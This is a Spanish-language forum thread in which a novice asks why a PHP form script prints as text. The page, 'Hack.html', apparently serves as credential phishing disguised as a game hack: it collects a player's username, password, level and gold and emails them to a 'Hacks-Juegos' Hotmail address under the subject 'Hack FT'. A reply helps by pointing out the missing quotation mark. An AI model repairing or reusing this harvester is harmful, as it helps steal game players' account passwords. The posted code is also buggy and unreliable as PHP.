Hola, me dirijo de nuevo a vosotros por este motivo:
Hace unos dias hice una web, con un formulario, bien, en el cual en action puse send.php (donde esta el script) y en method puse POST.
Al dirigirme ha hacer el script con un tutorial (no se programar) consegui esto:
< ?php $Nombre = $_POST['Nombre']; $Contraseña = $_POST['Contraseña]; $Nivel = $_POST['Nivel']; $Oro = $_POST['Oro']; $AP = $_POST['AP']; $header = 'From: ' . $Nombre . " \r\n"; $header .= "X-Mailer: PHP/" . phpversion() . " \r\n"; $header .= "Mime-Version: 1.0 \r\n"; $header .= "Content-Type: text/plain"; $mensaje = "Su nombre es " . $nombre . ", Contraseña " . $Contraseña . " \r\n"; $mensaje .= "Su Nivel es: " . $Nivel . " \r\n"; $mensaje .= "Oro: " . $Oro . " \r\n"; $mensaje .= "AP " . $AP . " \r\n"; $para = 'Hacks-Juegos.PS@hotmail.com'; $asunto = 'Hack FT'; mail($para, $asunto, utf8_decode($mensaje), $header); echo '&estatus=ok&'; ?>
Y lo subi ha la web todo.
Hay el problema, su ustedes entran en la web: http://asdfghjkl.site90.com/Hack.html, rellenan el formulario y pulsan enviar, ocurre lo que tiene que pasar, que vaya a send.php, pero en vez de enviarlo, te sale lo que pone en send.php, como si fuera un texto, osea, el codigo tal cual os muestro.
¿Me podriais decir cual es el fallo?
Objetivo: Mandar el Formulario A un email.
PSD: Ya se que el formulario de la web tiene mas apartados que el de send.php, pero esque los demas no los quiero.
PSD2: El codigo del formulario es:
<form name="form1" target="_parent" method="POST" action="send.php" enctype="application/x-www-form-urlencoded" style="margin:0px" mce_style="margin:0px"> <input name="Nombre Usuario" type="text" style="position:absolute;width:200px;left:308px;top:247px;z-index:3"> <input name="Contraseña" type="password" style="position:absolute;width:200px;left:263px;top:278px;z-index:4"> <input name="formtext3" type="text" style="position:absolute;width:200px;left:282px;top:309px;z-index:5"> <input name="Nivel" type="text" maxlength=2 style="position:absolute;width:200px;left:252px;top:341px;z-index:6"> <input name="AP ACTUAL" type="text" maxlength=6 style="position:absolute;width:200px;left:254px;top:470px;z-index:7"> <input name="Oro" type="text" maxlength=10 style="position:absolute;width:200px;left:257px;top:402px;z-index:8"> <input name="formtext10" type="text" maxlength=10 style="position:absolute;width:200px;left:332px;top:434px;z-index:9"> <input name="enviar" type="submit" value="Enviar consulta" style="position:absolute;left:632px;top:472px;z-index:10"> <input name="" type="text" maxlength=2 style="position:absolute;width:200px;left:327px;top:374px;z-index:11"> <input name="formtext5" type="text" maxlength=6 style="position:absolute;width:200px;left:329px;top:498px;z-index:12"> <input name="formtext11" type="text" maxlength=10 style="position:absolute;width:200px;left:254px;top:534px;z-index:13"> <input name="formtext12" type="text" maxlength=10 style="position:absolute;width:200px;left:331px;top:563px;z-index:14"> <input name="formtext13" type="text" maxlength=3 style="position:absolute;width:200px;left:262px;top:593px;z-index:15"> <input name="formtext14" type="text" maxlength=3 style="position:absolute;width:200px;left:336px;top:626px;z-index:16"> <input name="formtext15" type="text" maxlength=3 style="position:absolute;width:200px;left:261px;top:660px;z-index:17"> <input name="formtext16" type="text" maxlength=3 style="position:absolute;width:200px;left:340px;top:685px;z-index:18"> <input name="formtext17" type="text" maxlength=3 style="position:absolute;width:200px;left:262px;top:723px;z-index:19"> <input name="formtext4" type="text" maxlength=3 style="position:absolute;width:200px;left:337px;top:758px;z-index:21"> <input name="formtext18" type="text" maxlength=3 style="position:absolute;width:200px;left:261px;top:790px;z-index:22"> <input name="formtext19" type="text" maxlength=3 style="position:absolute;width:200px;left:334px;top:821px;z-index:23"> </form>
Gracias y Adios
Por favor, solo mirar el
Por favor, solo mirar el codigo y decirme el error, Gracias
Revisa las comillas, despues
Revisa las comillas, despues de $_POST['Contraseña te falta una, porfavor, revisa la estructura antes, xD.